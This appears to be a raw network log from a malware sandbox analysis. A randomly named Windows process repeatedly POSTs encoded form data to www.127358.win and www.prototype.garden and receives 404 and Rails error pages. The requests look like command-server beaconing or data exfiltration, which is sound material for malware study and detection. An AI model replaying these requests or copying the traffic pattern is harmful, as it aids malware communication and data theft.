Nov 20, 2024 04:21:15.269378901 CET	724	OUT	POST /qn33/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 200 Host: www.127358.win Origin: http://www.127358.win Referer: http://www.127358.win/qn33/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 77 2f 6c 54 43 67 69 64 30 47 30 52 6d 51 66 31 30 6a 63 4d 4b 71 79 57 45 32 4b 77 5a 35 44 46 32 4e 4c 35 50 67 45 5a 63 57 65 4d 75 68 58 35 79 79 34 43 6c 57 33 31 43 31 64 4f 43 41 68 37 6a 43 77 32 77 39 6b 6a 35 34 5a 43 44 2b 4d 65 6b 4e 38 6f 61 36 44 56 44 38 79 75 4a 7a 6e 4d 33 6c 67 73 6b 37 35 34 66 4f 36 64 55 30 37 45 67 62 47 68 38 6a 43 4b 67 4c 73 32 48 43 56 34 69 6c 44 59 49 49 77 65 79 69 6e 58 32 6e 49 48 2f 38 59 72 2b 4a 36 55 39 47 56 6d 6c 4c 5a 36 5a 32 58 6b 64 31 71 44 39 63 36 5a 4f 74 4a 66 59 41 43 48 6a 39 2b 79 4d 4d 6a 54 56 37 46 6e 56 77 3d 3d Data Ascii: xDq=w/lTCgid0G0RmQf10jcMKqyWE2KwZ5DF2NL5PgEZcWeMuhX5yy4ClW31C1dOCAh7jCw2w9kj54ZCD+MekN8oa6DVD8yuJznM3lgsk754fO6dU07EgbGh8jCKgLs2HCV4ilDYIIweyinX2nIH/8Yr+J6U9GVmlLZ6Z2Xkd1qD9c6ZOtJfYACHj9+yMMjTV7FnVw==
Nov 20, 2024 04:21:16.119029999 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:21:15 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	64865	206.238.89.119	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:17.825952053 CET	744	OUT	POST /qn33/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 220 Host: www.127358.win Origin: http://www.127358.win Referer: http://www.127358.win/qn33/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 77 2f 6c 54 43 67 69 64 30 47 30 52 30 68 76 31 32 41 30 4d 62 61 79 5a 42 32 4b 77 53 5a 44 42 32 4e 48 35 50 68 51 4a 64 6a 4f 4d 75 46 62 35 78 77 51 43 69 57 33 31 4e 56 64 48 66 77 68 73 6a 43 38 2b 77 34 6b 6a 35 34 4e 43 44 2f 38 65 6c 2b 45 72 62 71 44 58 49 63 79 73 48 54 6e 4d 33 6c 67 73 6b 37 39 42 66 4e 4b 64 55 6b 4c 45 69 35 2b 69 69 54 43 4a 77 37 73 32 4e 69 56 38 69 6c 44 36 49 4e 59 30 79 6b 72 58 32 69 30 48 78 4a 30 6f 33 4a 37 66 69 57 55 6f 68 5a 63 6c 51 55 2b 6e 56 33 36 4b 6a 59 71 71 4c 72 45 46 4a 78 6a 51 78 39 61 42 52 4c 71 6e 59 34 34 75 4f 31 53 35 53 76 68 67 6e 63 32 35 45 47 67 58 67 52 55 65 43 75 51 3d Data Ascii: xDq=w/lTCgid0G0R0hv12A0MbayZB2KwSZDB2NH5PhQJdjOMuFb5xwQCiW31NVdHfwhsjC8+w4kj54NCD/8el+ErbqDXIcysHTnM3lgsk79BfNKdUkLEi5+iiTCJw7s2NiV8ilD6INY0ykrX2i0HxJ0o3J7fiWUohZclQU+nV36KjYqqLrEFJxjQx9aBRLqnY44uO1S5Svhgnc25EGgXgRUeCuQ=
Nov 20, 2024 04:21:18.676577091 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:21:18 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	64866	206.238.89.119	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:20.375401020 CET	10826	OUT	POST /qn33/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10300 Host: www.127358.win Origin: http://www.127358.win Referer: http://www.127358.win/qn33/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 77 2f 6c 54 43 67 69 64 30 47 30 52 30 68 76 31 32 41 30 4d 62 61 79 5a 42 32 4b 77 53 5a 44 42 32 4e 48 35 50 68 51 4a 64 67 75 4d 76 77 48 35 79 58 6b 43 6a 57 33 31 41 31 64 4b 66 77 67 75 6a 43 6b 36 77 34 68 57 35 37 31 43 44 64 30 65 73 76 45 72 53 71 44 58 48 38 79 74 4a 7a 6e 5a 33 6c 77 67 6b 37 74 42 66 4e 4b 64 55 69 6e 45 73 37 47 69 67 54 43 4b 67 4c 73 79 48 43 56 55 69 6c 72 41 49 4e 63 4f 78 55 4c 58 32 43 45 48 38 66 41 6f 31 70 37 64 6a 57 56 31 68 59 67 41 51 55 69 4e 56 32 2b 7a 6a 66 61 71 4b 36 74 34 4e 68 65 4d 6b 39 66 65 47 62 75 64 64 34 41 38 57 55 6d 59 54 76 49 37 79 4e 53 51 42 55 74 5a 7a 52 30 2b 41 75 6e 78 75 52 2f 2b 4b 41 35 75 34 66 33 50 75 56 37 6f 78 7a 64 4d 73 7a 6f 70 42 55 33 75 43 48 74 5a 37 71 57 56 64 4e 41 45 30 4d 63 42 70 43 73 42 38 61 6e 61 72 49 66 4e 7a 7a 4b 63 31 6f 59 61 52 2f 31 50 70 43 6d 49 44 57 77 44 61 35 66 37 32 42 4a 33 70 47 64 59 72 4b 6f 36 54 5a 6b 41 55 34 74 39 58 4a 59 69 30 63 36 54 66 37 62 43 39 56 4c 53 74 7a [TRUNCATED] Data Ascii: xDq=w/lTCgid0G0R0hv12A0MbayZB2KwSZDB2NH5PhQJdguMvwH5yXkCjW31A1dKfwgujCk6w4hW571CDd0esvErSqDXH8ytJznZ3lwgk7tBfNKdUinEs7GigTCKgLsyHCVUilrAINcOxULX2CEH8fAo1p7djWV1hYgAQUiNV2+zjfaqK6t4NheMk9feGbudd4A8WUmYTvI7yNSQBUtZzR0+AunxuR/+KA5u4f3PuV7oxzdMszopBU3uCHtZ7qWVdNAE0McBpCsB8anarIfNzzKc1oYaR/1PpCmIDWwDa5f72BJ3pGdYrKo6TZkAU4t9XJYi0c6Tf7bC9VLStzQgTiI4sCJTRYcawjzGL6xt0ZkQZWPx3B22JiTMjKfQyy3jNa/jD9y/24BFKMmoziMiNUio9PiYI5bgyZTZEXzGy+P9QeZLX0lbPiFBnz9OnzkUk9UJ7kE4d9MIDlSHvigmPvLtws972V7uzvlLexVDNhJvVkK1BB+PeNDhxOsxlug6UJc4NUTu4ceg4l29UxPwVghWmbB9NMiQM1CCS2wHAaunjheh/sf0upDUa0nZtsX0J9yXsbxozJPwPsra6XVa1v/9IZbSzaZTGu0XbX1oFxqc/O+FOn4KF5y7YXjpCbmzncvE62wTbLJxBZL62IvFTgqAXjcbr85OftBch0cdHZcksTYFFVt2nvn2pwMYEDBcZrgDPDWQQOAGX/mqlWnNgwDRaMXcl+K44ldAVrAlcoIcSdXd03KC+UBstmakebwd4XpXDyLLbvV15ilsIp84r6Sybhy+lWkddREZzK4g8eTVFwpKFLnYjkuhnFLuIykhxUEDXgMZdTFel0blwPbLG8nECuZ+If9de31ObXn22onbjdzezmpvCPPaa1d8Lv1IYSR4pOOFTbPOp0I/lln5ErMEzIGqxfRuRHzARJ6w+XFDSPWOsALop9uIZZtP6mudVInxXDqm7dBz8+gG00BB1mIUGpoWuluonb4s9jQgnAY4FDOLULDk [TRUNCATED]
Nov 20, 2024 04:21:21.331279039 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:21:21 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	64867	206.238.89.119	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:22.911297083 CET	466	OUT	GET /qn33/?xDq=99NzBUOu8EtmiwHLkwkwM6CtLEWWEZ390ZejPygVUj3ypAzbuWBUlAjLLmpNciJuv0EF7eUmh88cLf0Gn8IRd668KNerATnE+FhfiYpUJ+CuKGzT26uc/xk=&Lhx=fPAh7htHyFPl- HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.127358.win User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 20, 2024 04:21:23.782883883 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:21:23 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	64868	216.40.34.41	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:29.077188015 CET	742	OUT	POST /mjdo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 200 Host: www.prototype.garden Origin: http://www.prototype.garden Referer: http://www.prototype.garden/mjdo/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 33 43 72 69 6b 62 6f 72 67 48 45 79 77 76 49 2b 4a 6b 51 63 30 63 41 55 41 34 4c 33 79 4c 52 73 57 57 31 7a 33 73 69 73 4e 2f 32 6a 48 67 55 55 39 6e 41 6b 6e 35 52 67 41 76 41 74 50 50 48 57 35 69 64 74 53 2f 32 7a 6b 7a 31 6f 6e 54 31 57 65 46 58 35 61 4c 52 76 61 4c 57 32 58 55 47 73 30 76 51 43 36 39 63 46 78 6b 34 47 30 77 65 57 68 41 63 74 5a 7a 74 51 65 45 44 56 58 7a 35 6b 30 4a 41 2b 53 36 4c 4b 66 41 62 36 30 78 7a 57 53 71 72 6d 7a 56 6e 58 6d 74 77 7a 37 42 39 57 73 68 36 4a 65 45 69 35 70 6f 49 53 68 57 30 58 75 43 51 34 34 6b 62 6f 52 6e 4e 31 45 75 6b 78 2b 51 3d 3d Data Ascii: xDq=3CrikborgHEywvI+JkQc0cAUA4L3yLRsWW1z3sisN/2jHgUU9nAkn5RgAvAtPPHW5idtS/2zkz1onT1WeFX5aLRvaLW2XUGs0vQC69cFxk4G0weWhActZztQeEDVXz5k0JA+S6LKfAb60xzWSqrmzVnXmtwz7B9Wsh6JeEi5poIShW0XuCQ44kboRnN1Eukx+Q==
Nov 20, 2024 04:21:29.573220015 CET	1236	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: ed82a7e4-35b2-406b-af01-22469b6bf94f x-runtime: 0.030492 content-length: 17075 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
Nov 20, 2024 04:21:29.573288918 CET	1236	IN	Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
Nov 20, 2024 04:21:29.573335886 CET	448	IN	Data Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
Nov 20, 2024 04:21:29.573380947 CET	1236	IN	Data Raw: 65 73 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 4c 69 67 68 74 47 6f 6c 64 65 6e 52 6f 64 59 65 6c 6c 6f 77 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 32 70 78 20 53 6c 61 74 Data Ascii: es { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none; } #route_table td
Nov 20, 2024 04:21:29.573429108 CET	1236	IN	Data Raw: 54 72 61 63 65 26 23 33 39 3b 29 3b 73 68 6f 77 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 41 70 70 6c 69 63 61 74 69 6f 6e 20 54 72 61 63 65 3c 2f Data Ascii: Trace');show('Application-Trace');; return false;">Application Trace</a> \| <a href="#" onclick="hide('Application-Trace');hide('Full-Trace');show('Framework-Trace');; return false;">Framework Trace</a> \|
Nov 20, 2024 04:21:29.573471069 CET	1236	IN	Data Raw: 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 35 22 20 68 72 65 66 3d 22 23 22 3e 72 65 71 75 65 73 74 5f 73 74 6f 72 65 20 28 31 2e 35 2e 30 29 20 6c 69 Data Ascii: /a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call'</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/reques
Nov 20, 2024 04:21:29.573514938 CET	1236	IN	Data Raw: 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 35 22 20 68 72 65 Data Ascii: uration.rb:228:in `call'</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request'</a><br><a class="trace-frames" data-frame-id="16" href="#">puma (4.3.9) lib/puma/server.rb:472:
Nov 20, 2024 04:21:29.573558092 CET	1236	IN	Data Raw: 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 72 65 6d 6f 74 65 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 Data Ascii: patch/middleware/remote_ip.rb:81:in `call'</a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call'</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpac
Nov 20, 2024 04:21:29.573601007 CET	1236	IN	Data Raw: 65 2d 69 64 3d 22 31 34 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 Data Ascii: e-id="14" href="#">puma (4.3.9) lib/puma/configuration.rb:228:in `call'</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request'</a><br><a class="trace-frames" data-frame-id="16
Nov 20, 2024 04:21:29.573647022 CET	1236	IN	Data Raw: 65 20 3d 20 74 61 72 67 65 74 3b 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 43 68 61 6e 67 65 20 74 68 65 20 65 78 74 72 61 63 74 65 64 20 73 6f 75 72 63 65 20 63 6f 64 65 0a 20 20 20 20 20 20 20 20 63 68 61 6e 67 65 53 6f 75 72 63 65 45 78 74 72 61 Data Ascii: e = target; // Change the extracted source code changeSourceExtract(frame_id); }); function changeSourceExtract(frame_id) { var el = document.getElementById('frame-source-' + frame_id); if (current
Nov 20, 2024 04:21:29.578654051 CET	1236	IN	Data Raw: 20 20 3c 74 62 6f 64 79 20 63 6c 61 73 73 3d 27 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 27 20 69 64 3d 27 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 27 3e 0a 20 20 3c 2f 74 62 6f 64 79 3e 0a 20 20 3c 74 62 6f 64 79 3e 0a 20 20 20 20 3c 74 72 20 63 6c Data Ascii: <tbody class='fuzzy_matches' id='fuzzy_matches'> </tbody> <tbody> <tr class='route_row' data-helper='path'> <td data-route-name='root'> root<span class='helper'>_path</span> </td> <td> GET </td> <td data-route-pat

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	64869	216.40.34.41	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:31.618158102 CET	762	OUT	POST /mjdo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 220 Host: www.prototype.garden Origin: http://www.prototype.garden Referer: http://www.prototype.garden/mjdo/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 33 43 72 69 6b 62 6f 72 67 48 45 79 78 50 59 2b 50 48 34 63 78 38 41 56 4d 59 4c 33 34 72 52 67 57 57 35 7a 33 74 6d 47 4e 4b 47 6a 48 46 51 55 2b 6d 41 6b 67 35 52 67 4b 50 41 30 51 2f 48 4e 35 69 51 61 53 37 32 7a 6b 7a 52 6f 6e 58 78 57 66 79 37 2b 62 62 52 74 45 72 57 30 4b 45 47 73 30 76 51 43 36 39 59 76 78 69 51 47 31 42 4f 57 6a 6c 67 71 48 44 74 54 5a 45 44 56 64 54 35 67 30 4a 42 72 53 2b 53 6c 66 43 54 36 30 77 44 57 4c 66 66 68 35 56 6d 53 69 74 78 6a 71 78 34 67 74 78 32 49 66 55 71 73 6f 4b 45 43 6b 51 35 4e 2f 7a 78 76 71 6b 2f 62 4d 67 45 42 4a 74 5a 34 6c 65 48 69 4f 67 4e 65 49 76 4f 4a 38 7a 6e 51 49 74 59 2b 63 38 51 3d Data Ascii: xDq=3CrikborgHEyxPY+PH4cx8AVMYL34rRgWW5z3tmGNKGjHFQU+mAkg5RgKPA0Q/HN5iQaS72zkzRonXxWfy7+bbRtErW0KEGs0vQC69YvxiQG1BOWjlgqHDtTZEDVdT5g0JBrS+SlfCT60wDWLffh5VmSitxjqx4gtx2IfUqsoKECkQ5N/zxvqk/bMgEBJtZ4leHiOgNeIvOJ8znQItY+c8Q=
Nov 20, 2024 04:21:32.152026892 CET	1236	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 4861bdd1-ef01-4c65-9e2a-0a09b268f1ab x-runtime: 0.034764 content-length: 17095 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 